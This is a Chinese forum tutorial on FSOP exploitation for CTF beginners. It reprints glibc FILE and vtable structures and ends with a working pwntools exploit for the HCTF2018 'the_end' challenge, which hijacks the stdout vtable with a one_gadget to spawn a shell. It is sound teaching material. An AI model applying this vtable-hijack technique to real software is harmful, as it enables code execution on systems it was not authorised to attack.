其他
新人PWN入坑总结
看雪论坛作者ID:PIG-007
FSOP0xd
1
FILE前置知识
#注释头
struct _IO_FILE_plus
{
_IO_FILE file;
IO_jump_t *vtable;
}
#注释头
_IO_2_1_stderr_
_IO_2_1_stdout_
_IO_2_1_stdin_
#注释头
struct _IO_FILE {
int _flags; /* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags
/* The following pointers correspond to the C++ streambuf protocol. */
/* Note: Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
char* _IO_read_ptr; /* Current read pointer */
char* _IO_read_end; /* End of get area. */
char* _IO_read_base; /* Start of putback+get area. */
char* _IO_write_base; /* Start of put area. */
char* _IO_write_ptr; /* Current put pointer. */
char* _IO_write_end; /* End of put area. */
char* _IO_buf_base; /* Start of reserve area. */
char* _IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
char *_IO_save_base; /* Pointer to start of non-current get area. */
char *_IO_backup_base; /* Pointer to first valid character of backup area */
char *_IO_save_end; /* Pointer to end of non-current get area. */
struct _IO_marker *_markers;
struct _IO_FILE *_chain;
int _fileno;
#if 0
int _blksize;
#else
int _flags2;
#endif
_IO_off_t _old_offset; /* This used to be _offset but it's too small. */
#define __HAVE_COLUMN /* temporary */
/* 1+column number of pbase(); 0 is unknown. */
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];
/* char* _save_gptr; char* _save_egptr; */
_IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};
#注释头
struct _IO_FILE_complete
{
struct _IO_FILE _file;
#endif
#if defined _G_IO_IO_FILE_VERSION && _G_IO_IO_FILE_VERSION == 0x20001
_IO_off64_t _offset;
# if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
/* Wide character stream stuff. */
struct _IO_codecvt *_codecvt;
struct _IO_wide_data *_wide_data;
struct _IO_FILE *_freeres_list;
void *_freeres_buf;
# else
void *__pad1;
void *__pad2;
void *__pad3;
void *__pad4;
# endif
size_t __pad5;
int _mode;
/* Make sure we don't get into trouble again. */
char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
#endif
};
#注释头
_IO_stderr_
_IO_stdout_
_IO_stdin_
#注释头
struct _IO_jump_t
{
JUMP_FIELD(size_t, __dummy);
JUMP_FIELD(size_t, __dummy2);
JUMP_FIELD(_IO_finish_t, __finish);
JUMP_FIELD(_IO_overflow_t, __overflow);
JUMP_FIELD(_IO_underflow_t, __underflow);
JUMP_FIELD(_IO_underflow_t, __uflow);
JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
/* showmany */
JUMP_FIELD(_IO_xsputn_t, __xsputn);
JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
JUMP_FIELD(_IO_seekoff_t, __seekoff);
JUMP_FIELD(_IO_seekpos_t, __seekpos);
JUMP_FIELD(_IO_setbuf_t, __setbuf);
JUMP_FIELD(_IO_sync_t, __sync);
JUMP_FIELD(_IO_doallocate_t, __doallocate);
JUMP_FIELD(_IO_read_t, __read);
JUMP_FIELD(_IO_write_t, __write);
JUMP_FIELD(_IO_seek_t, __seek);
JUMP_FIELD(_IO_close_t, __close);
JUMP_FIELD(_IO_stat_t, __stat);
JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
JUMP_FIELD(_IO_imbue_t, __imbue);
#if 0
get_column;
set_column;
#endif
};
#注释头
char* _IO_read_ptr; /* Current read pointer */
char* _IO_read_end; /* End of get area. */
char* _IO_read_base; /* Start of putback+get area. */
char* _IO_write_base; /* Start of put area. */
char* _IO_write_ptr; /* Current put pointer. */
char* _IO_write_end; /* End of put area. */
char* _IO_buf_base; /* Start of reserve area. */
char* _IO_buf_end;
#注释头
char *_IO_save_base; /* Pointer to start of non-current get area. */
char *_IO_backup_base; /* Pointer to first valid character of backup area */
char *_IO_save_end; /* Pointer to end of non-current get area. */
struct _IO_marker *_markers;
#注释头
*_IO_list_all->_IO_2_1stderr_
_IO_2_1stderr_.chain->_IO_2_1stderr_
_IO_2_1stderr_.chain->_IO_2_1stdout_
_IO_2_1stdout_.chain->_IO_2_1stdin_
_IO_2_1stdin_.chain=0x0
#注释头
int _fileno;
int _blksize;
int _flags2;
_IO_off_t _old_offset; /* This used to be _offset but it's too small. */
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];
_IO_lock_t *_lock;
#注释头
_IO_off64_t _offset;
struct _IO_codecvt *_codecvt;
struct _IO_wide_data *_wide_data;
struct _IO_FILE *_freeres_list;
void *_freeres_buf;
void *__pad1;
void *__pad2;
void *__pad3;
void *__pad4;
size_t __pad5;
int _mode;
char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
#注释头
fake_IO_FILE_._mode <= 0
fake_IO_FILE_._IO_write_ptr > fake_IO_FILE._IO_write_base
2
HCTF2018_the_end
#注释头
_IO_FILE_plus._mode <= 0
_IO_FILE_plus._IO_write_ptr > _IO_FILE_plus._IO_write_base
#注释头
from pwn import *
libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
p = process('./the_end')
vtable_offset = 0xd8
_setbuf_offset = 0x58
fake_vtable_offset = 0x3c5588
#这个需要自己调试找,并保证偏移_setbuf_offset处修改之后程序不会直接崩溃
sleep_addr = p.recvuntil(', good luck',drop=True).split(' ')[-1]
libc_base = long(sleep_addr,16) - libc.symbols['sleep']
one_gadget = libc_base + 0xf02b0
_IO_2_1_stdout_vtable_addr = libc_base + libc.sym['_IO_2_1_stdout_'] + vtable_offset
fake_vtable = libc_base + fake_vtable_offset
fake_vtable_setbuf_addr = libc_base + fake_vtable_offset + _setbuf_offset
print 'libc_base: ',hex(libc_base)
print 'one_gadget:',hex(one_gadget)
for i in range(2):
p.send(p64(_IO_2_1_stdout_vtable_addr+i))
p.send(p64(fake_vtable)[i])
for i in range(3):
p.send(p64(fake_vtable_setbuf_addr+i))
p.send(p64(one_gadget)[i])
p.sendline("exec /bin/sh 1>&0")
p.interactive()
#注释头
_IO_FILE_plus._mode <= 0 //该条件自动就会满足
_IO_FILE_plus._IO_write_ptr > _IO_FILE_plus._IO_write_base//该条件需要设置1个字节
看雪ID:PIG-007
https://bbs.pediy.com/user-home-904686.htm
# 往期推荐
1. 新人PWN堆Heap总结
2. 如何利用栈溢出漏洞
4. Galgame汉化中的逆向:ArmArm64_ELF中汉化字符串超长修改方法
6. V8利用初探 2019 StarCTF oob 复现分析
球分享
球点赞
球在看
点击“阅读原文”,了解更多!